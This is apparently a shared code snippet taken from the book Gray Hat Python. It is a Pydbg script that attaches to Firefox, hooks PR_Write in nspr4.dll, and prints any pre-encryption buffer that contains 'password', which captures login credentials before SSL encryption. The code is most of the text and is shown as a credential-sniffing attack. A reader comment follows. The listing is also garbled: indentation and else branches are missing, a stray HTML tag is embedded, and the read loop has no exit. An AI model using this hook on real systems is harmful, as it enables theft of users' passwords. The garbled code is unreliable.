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Created February 25, 2014 17:39
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Pydbg: sample to hook a firefox function to retrieve credentials (Gray Hat Python book)
Example taken from Gray Hat Python (book)
This script present a way to hook a DLL library in Firefox. For this example the script hook nspr4.dll which encrypt datas for SSL connection.
So we will be able to get the text before it is encrypted. Moreover we catch a pattern "password" to get all login/password before they are ciphered.
from pydbg import *
from pydbg.defines import *
import utils
import sys
dbg = pydbg()
found_firefox = False
# Set a pattern that we can make the hook to search for
pattern = "password"
# This is our entry hook callback function
def <span style="color: #ff00ff;">ssl_sniff( dbg, args ):
# Now we read out the memory pointed to by the second argument
# it is stored as an ASCII string, so we'll loop on a read until
# we reach a NULL byte
buffer = ""
offset = 0
while 1:
byte = dbg.read_process_memory( args[1] + offset, 1 )
if byte != "\x00":
buffer += byte
offset += 1
if pattern in buffer:
print "Pre-Encrypted: %s" % buffer
# Quick and dirty process enumeration to find firefox.exe
for (pid, name) in dbg.enumerate_processes():
if name.lower() == "firefox.exe":
found_firefox = True
hooks = utils.hook_container()
print "[*] Attaching to firefox.exe with PID: %d" % pid
# Resolve the function address (Just before encryption)
hook_address = dbg.func_resolve_debuggee("nspr4.dll","PR_Write")
if hook_address:
# Add the hook to the container. We aren't interested
# in using an exit callback, so we set it to None.
hooks.add( dbg, hook_address, 2, ssl_sniff, None )
print "[*] nspr4.PR_Write hooked at: 0x%08x" % hook_address
print "[*] Error: Couldn't resolve hook address."
if found_firefox:
print "[*] Hooks set, continuing process."
print "[*] Error: Couldn't find the firefox.exe process."
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Where can i find the documentation for nspr4.dll ?. This DLL seems to be deprecated in newer versions of firefox

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